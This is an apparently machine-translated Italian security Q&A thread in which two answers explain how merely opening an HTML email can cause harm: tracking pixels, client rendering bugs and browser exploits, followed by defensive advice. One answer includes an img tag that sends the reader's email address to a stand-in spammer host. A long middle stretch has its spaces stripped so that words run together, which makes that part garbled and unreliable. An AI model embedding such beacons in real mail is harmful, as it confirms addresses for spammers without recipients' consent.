In che modo un'e-mail può danneggiare semplicemente l'apertura?

5

es. link

Supponendo che l'utente non faccia clic su nessun link e non apra alcun allegato nell'e-mail o in alcun elemento di questo tipo - lo apre semplicemente.

    
posta Matt H 02.02.2012 - 09:24
fonte

2 risposte

10

Ti darò un esempio davvero semplice. Un trucco di spammer comune molto prima che i client venissero aggiornati per contrastare questo era quello di incorporare una GIF quadrata di 1px in una email HTML. Riceverai un messaggio del tipo:

<img src="http://nastyevilspammer.invalid/[email protected]"/>

Inutiledirechepic.gifèineffettiunoscriptcgicheaccettaunparametroget.Ilrisultatoèsimileaquesto:

  1. Ilclientaprelapostaelettronica.
  2. Ilclientesegueautomaticamenteilrenderingdihtml,inclusoilrecuperodituttoilcontenutoremoto.
  3. nastyevilspammer.invalidvienerichiestoperquell'indirizzo,inclusal'emailnelparametroget.
  4. Unprogrammavieneattivatosulserver,registrailparametrogeterestituiscelaGIF1px.

Questotruccoèstatoutilizzatoperconfermaregliindirizzie-mailcomeobiettividispamattivi,perspostarlisuelenchidiindirizziattivi,cheglispammervendonopoi.

Ilproblema,elasoluzione,sitrovanelpassaggio2-automaticamentechesifidadelcontenutoinentrata.

Ibugnelclientdipostaelettronicacherichiedonosololaletturadell'emailrichiedonounerrorenellettoreclientchepuòessereutilizzatoperattivarel'exploit.Adesempio,unmotoredirenderingHTMLpotrebbecaricareilflashplayer.Èimprobabile,mapotrebberoessercidegliexploitnelcodicedielaborazionedellestringhedelclient.Ecosìvia.

QuestovaleanchepericlientWeb,chefornirannoHTMLalbrowserperilrendering,aprendocosìtuttelevulnerabilitàdelbrowsercollegate.Nonavevointenzionedileggerel'articolo,maoraho:

Thenewgenerationofe-mail-bornemalwareconsistsofHTMLe-mailswhichautomaticallydownloadsmalwarewhenthee-mailisopened.'

L'articoloèunpo'dilucesuidettagli,mamipiacerebbeprenderetempoperfornireunconsigliopiùcalmo:

  • QuestoèilDailyMailevengodalRegnoUnito.Hannolatendenzaaspaventarelestorie.
  • Questanonèaffattouna"nuova generazione" di malware. Le persone hanno sfruttato i bug di e-mail HTML sin dall'età della pietra, o almeno da prima del primo film Matrix, e anche i download drive-by hanno funzionato per un po '.
  • Un contromisura molto semplice è configurare il client di posta elettronica in modo che non esegua il rendering del contenuto html, per impostazione predefinita. È quindi possibile caricare facoltativamente l'email html da fonti attendibili. I lettori di e-mail più decenti possono farlo e farlo di default, inclusi GMail e Thunderbird (i due client che uso).
  • Puoi fare molto per migliorare le tue possibilità di evitare il malware eseguendo il solito: attiva Aggiornamenti di Windows. Installa firewall / antivirus. Fai attenzione a quali siti visiti. Aggiungi estensioni orientate alla sicurezza al tuo browser ( NotScripts , noscript ecc.). Usa il browser e il sistema operativo più recenti che puoi. Ecc.

    e infine:

  • Potrebbe sembrare che l'e-mail provenga dai tuoi contatti / amici, ma non hai modo di verificarlo - fai attenzione. La tua banca / società di costruzione non ha bisogno che tu verifichi i tuoi dati di contatto via Internet - se hanno un problema che probabilmente ti scriverebbero e se non sei sicuro, vai nella tua filiale. Un uomo ricco in Nigeria ha non ti ha lasciato una grande eredità, quelle pillole blu non funzionano e qualsiasi altra cosa che sembra troppo bella per essere vera probabilmente lo è.

risposta data 02.02.2012 - 10:49
fonte
3

In questo caso l'email deve sfruttare un bug nel tuo client di posta elettronica. È relativamente difficile per le e-mail di testo semplice, ma più semplice per le e-mail html. I parser e i renderer Html sono complessi e spesso contengono bug che consentono l'esecuzione di codice (ad esempio un buffer overflow). La visualizzazione di un'e-mail maligna è piuttosto simile alla visualizzazione di un sito Web malvagio dal punto di vista della sicurezza.

    
risposta data 02.02.2012 - 10:41
fonte

Leggi altre domande sui tag